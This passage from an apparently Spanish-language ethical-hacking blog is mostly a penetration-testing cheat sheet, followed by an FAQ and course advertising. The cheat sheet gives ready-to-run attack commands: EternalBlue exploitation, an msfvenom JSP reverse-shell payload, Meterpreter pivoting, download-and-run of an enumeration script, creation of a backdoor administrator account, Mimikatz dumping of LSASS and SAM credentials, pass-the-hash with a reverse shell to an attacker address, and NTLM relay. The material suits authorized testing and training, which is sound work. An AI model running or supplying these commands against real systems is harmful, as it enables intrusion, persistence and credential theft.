> search eternalblue |
EJECUTAR EXPLOTACIÓN: |
---|
msf exploit(…) > exploit |
GENERAR REVERSE SHELL (WAR): |
---|
# msfvenom -p |
java/jsp_shell_reverse_tcp LHOST=<your |
ip address> LPORT=443 -f war > sh.war |
ACTUALIZAR A METERPRETER (O PRESIONAR ^Z (CTRL-Z)): |
---|
background |
Background session 1? [y/N] y |
> sessions # list sessions |
> sessions -u 1 # Upgrade |
> sessions 2 # interact with session 2 |
meterpreter > sysinfo # use it |
ENVÍO DE PUERTO A LOCALHOST: |
---|
meterpreter > portfwd add -l 2323 -p |
3389 -r 10.5.23.23 |
PIVOTAR A TRAVÉS DE LA SESIÓN DE METERPRETER EXISTENTE: |
---|
> use post/multi/manage/autoroute |
> set session 2 # meterpreter session |
> run |
> route |
CONFIGURAR PROXYCHAINS: |
---|
# vi /etc/proxychains.conf |
[…] |
socks4 127.0.0.1 1080 |
Ataques a la Red
Escalada de privilegios de Linux
NUMERA INFORMACIÓN LOCAL (-T PARA MÁS PRUEBAS): |
---|
# curl -o /tmp/linenum |
https://raw.githubusercontent.com/rebo |
otuser/LinEnum/master/LinEnum.sh |
# bash /tmp/linenum -r /tmp/report |
Other hardening checks can be done using lynis or LinPEAS. |
Use sudo/SUID/capabilities/etc. exploits from gtfobins.github.io. |
Escalada de privilegios de Windows
ESCANEAR EN BUSCA DE RECURSOS COMPARTIDOS DE RED: |
---|
# smbmap.py –host-file smbhosts.txt – |
u Administrator -p PasswordOrHash |
Copy PowerUp.ps1 from GitHub “PowerShellMafia/ |
PowerSploit” into PowerShell to |
bypass ExecutionPolicy and execute Invoke- |
AllChecks. Use the abuse functions. |
AÑADIR UN NUEVO ADMINISTRADOR LOCAL: |
---|
C:\> net user backdoor P@ssw0rd23 |
C:\> net localgroup Administrators |
backdoor /add |
Recopilación de credenciales de Windows
INICIAR MIMIKATZ Y CREAR ARCHIVO DE REGISTRO: |
---|
C:\>mimikatz.exe |
# privilege::debug |
# log C:\tmp\mimikatz.log |
MOSTRAR CONTRASEÑAS/HASHES DE USUARIOS INICIADOS: |
---|
# sekurlsa::logonpasswords |
EXTRAER HASHES USANDO MIMIKATZ: |
---|
# lsadump::sam /system:system.hiv |
/sam:sam.hiv |
LEA EL VOLCADO DEL PROCESO LSASS.EXE: |
---|
# sekurlsa::minidump lsass.dmp |
Dump lsass.exe in taskmgr or procdump. |
SISTEMA DE RESPALDO Y SAM HIVE: |
---|
C:\>reg save HKLM\SYSTEM system.hiv |
C:\>reg save HKLM\SAM sam.hiv |
Pass-the-Hash
INICIAR MIMIKATZ Y CREAR ARCHIVO DE REGISTRO: |
---|
C:\>mimikatz.exe |
# privilege::debug |
# log C:\tmp\mimikatz.log |
MEDIDOR A TRAVÉS DE PASS-THE-HASH: |
---|
msf > set payload |
windows/meterpreter/reverse_tcp |
msf > set LHOST 10.5.23.42 # attacker |
msf > set LPORT 443 |
msf > set RHOST 10.5.23.21 # victim |
msf > set SMBPass 01[…]03:01[…]03 |
msf > exploit |
meterpreter > shell |
C:\WINDOWS\system32> |
SOBRE UNA SUBRED Y EXTRAER ARCHIVO SAM: |
---|
# crackmapexec -u Administrator -H |
:011AD41795657A8ED80AB3FF6F078D03 |
10.5.23.0/24 –sam |
RDP A TRAVÉS DE PASS-THE-HASH: |
---|
# xfreerdp /u:user /d:domain /pth: |
011AD41795657A8ED80AB3FF6F078D03 |
/v:10.5.23.42 |
BUSCA ACCIONES A TRAVÉS DE PASS-THE-HASH: |
---|
# ./smbclient.py |
domain/usrname@10.5.23.42 -hashes |
:011AD41795657A8ED80AB3FF6F078D03 |
NTLM Relay
VULNERABLE SI MESSAGE_SIGNING: DESHABILITADO: |
---|
# nmap -n -Pn -p 445 –script smbsecurity- |
mode 10.5.23.0/24 |
NTLM RELAY USANDO SOCKS PROXY: |
---|
# ./ntlmrelayx.py -tf targets.txt |
-smb2support -socks |
Configure ProxyChains: |
# vi /etc/proxychains.conf |
[…] |
socks4 127.0.0.1 1080 |
DESHABILITE SMB Y HTTP EN RESPONDER.CONF E INICIAR RESPONDER: |
---|
# ./Responder.py -I eth0 |
NTLM RELAY PARA OBTENER Y EXTRAER EL ARCHIVO SAM: |
---|
# ./ntlmrelayx.py -smb2support -t |
smb://10.5.23.42 |
ACCEDER A ARCHIVOS A TRAVÉS DE SOCKS PROXY: |
---|
# proxychains smbclient -m smb3 |
‘\\10.5.23.42\C$’ -W pc05 -U |
Administrator%invalidPwd |
Active Directory
Utilice SharpHound para recopilar información e importarla a Bloodhound para analizarla. |
Descargue PingCastle de pingcastle.com y genere un informe. |
Preguntas frecuentes
¿Qué utilizan la mayoría de los hackers para hackear?
Hay varias herramientas que los HACKERS utilizan para realizar piratería. Lo más común es que los HACKERS utilicen:
- Nmap para escanear una red
- Herramientas como Netcat o Meterpreter para detectar shells
- Hashcat para descifrar contraseñas
- Metasploit para administrar sesiones y lanzar exploits
- Mimikatz para la recopilación de credenciales de Windows
Consulte nuestra lista de Las 250 Mejores Herramientas para Hackers para más información.
¿Cuál es el primer paso del hackeo?
Suponiendo que ya pasó por el proceso de obtener permiso por escrito del propietario del sistema para realizar una prueba y confirmó que recibió la dirección IP de destino correcta, el primer paso sería el escaneo y la enumeración (a veces denominado simplemente reconocimiento).
¿Hackear es un delito?
Hackear no es un delito, pero piratear un sistema sin el permiso del propietario es un delito y puede acarrear repercusiones legales muy graves.
¿Qué codificación utilizan los hackers?
Los hackers suelen estar familiarizados con lenguajes de programación como Bash, Powershell y Python. Otros lenguajes de codificación pueden depender de su especialidad (como C para desarrolladores de exploits o Java para probadores de penetración de aplicaciones web).
¿Qué tipo de hacker es mejor?
Si por tipos se refiere a:
- Hackers de Sombrero blanco (hackers éticos que auditan sistemas con permiso)
- Hackers de Sombrero negro (hackers criminales que generalmente buscan dañar un sistema)
- Hackers de Sombrero gris (hackers con buenas intenciones pero aún así piratean un sistema sin permiso)
- Hackers de sombrero Rojo (vigilantes que hackean hackers de sombrero negro)
Entonces preferimos los sombreros blancos. Buscan hacer de internet un lugar más seguro y siempre con el consentimiento del propietario del sistema. También se benefician de no enfrentar cargos penales y, en promedio, ganan más dinero que los otros tipos.
¿Qué quieren los hackers?
Diferentes hackers quieren cosas diferentes. Algunos quieren ayudar a defender los sistemas de manera legal, otros quieren defender los sistemas de manera ilegal, algunos quieren dañar los sistemas por diversión o ganancias, y otros tienen motivaciones completamente diferentes.
Lo único en común es que los hackers quieren ver cómo funciona un sistema e intentar hacerlo actuar de una manera para la que no fue diseñado.
No te detengas, sigue avanzando
Aquí tienes un propósito para este 2024 que debes considerar seriamente: si has querido mejorar tus habilidades en hacking, Ciberseguridad y programación ahora es definitivamente el momento de dar el siguiente paso. ¡Desarrolla tus habilidades aprovechando nuestros cursos a un precio increíble y avanza en tu carrera! El mundo necesita más hackers…
Universidad Hacking. Todo en Ciberseguridad. Curso Completo
Aprende Hacking Ético y Ciberseguridad sin necesitar conocimientos Previos. Practica Hacking Ético y Ciberseguridad aquí
Calificación: 4,6 de 5 (2.877 calificaciones) 15.284 estudiantes Creado por Alvaro Chirou • 1.800.000+ Enrollments Worldwide
Lo que aprenderás
- Seguridad informática
- Hacking Ético en profundidad
- Redes
- Programación (Python) (Hacking con Python)
- Análisis de Malware con laboratorios, practicas y ejecución de Malware para que veas su comportamiento.
- Cómo reforzar tu Privacidad y Anonimato
- Uso avanzado de Metasploit
- Top 10 de Owasp Web, Top 10 de Owasp mobile y Top 10 de Owasp API
- Seguridad informática para empresas
- Kali linux de 0 a 100, Veremos su suite de herramientas de hacking y como explotar fallos en sistemas.
- Termux y como hackear desde el celular
- Seguridad informática server/web, profundizaremos en WordPress
- Análisis de trafico en Wireshark
- Y mucho, pero mucho más
¿Esto que significa?
Hoy más que nunca, se necesitan personas capacitadas en este rubro para trabajar.
Por esa razón cree esta formación profesional para compartirte mis conocimientos y experiencia en la materia y puedas iniciar en este mundo del Hacking Ético y Ciberseguridad.
Te voy a estar acompañando en el proceso de aprendizaje, donde si estas empezando desde 0, sin conocimientos previos, no es un impedimento ya que iniciaremos como si no supieras nada de la materia.
Si sos una persona con conocimientos, podrás iniciar directamente en el nivel más avanzado o en el que tu elijas.
Como en todos mis cursos en udemy, tendrás muchísima practica para que materialices lo que vas aprendiendo.
Aprende con nuestros más de 100 cursos que tenemos disponibles para vos
No solo te enseñamos, tambien te guíamos para que puedas conseguir trabajo como desarrollador y hacker…
¿Te gustaría enterarte de cuando lanzamos descuentos y nuevos cursos?
Sobre los autores
Álvaro Chirou
Yo soy Álvaro Chirou, tengo más de 20 Años de experiencia trabajando en Tecnología, eh dado disertaciones en eventos internacionales como OWASP, tengo más de 1.800.000 estudiantes en Udemy y 100 formaciones profesionales impartidas en la misma. Puedes seguirme en mis redes:
Laprovittera Carlos
Soy Laprovittera Carlos. Con más de 20 años de experiencia en IT brindo Educación y Consultoría en Seguridad de la Información para profesionales, bancos y empresas. Puedes saber más de mi y de mis servicios en mi sitio web: laprovittera.com y seguirme en mis redes:
¿Quieres iniciarte en hacking y ciberseguridad pero no sabes por dónde empezar? Inicia leyendo nuestra guia gratuita: https://achirou.com/como-iniciarse-en-ciberseguridad-y-hacking-en-2024/ que te lleva de 0 a 100. Desde los fundamentos más básicos, pasando por cursos, recursos y certificaciones hasta cómo obtener tu primer empleo.
SIGUE APRENDIENDO GRATIS CON NUESTRAS GUIAS
Cómo Iniciarse en Hacking y Ciberseguridad en 2024
Curso Gratis de Programación
Curso Gratis Linux – Capitulo 1 – Introducción a Linux
Curso Gratis de Redes – Capitulo 1 – Tipos de redes y servicios
Como iniciarse en TRY HACK ME – Complete Beginner #1
OSINT #1 Más de 200 Search Tools
Curso Gratis de Java para Hackers
SIGUE APRENDIENDO GRATIS EN NUESTRO BLOG
Saludos amigos y happy hacking!!!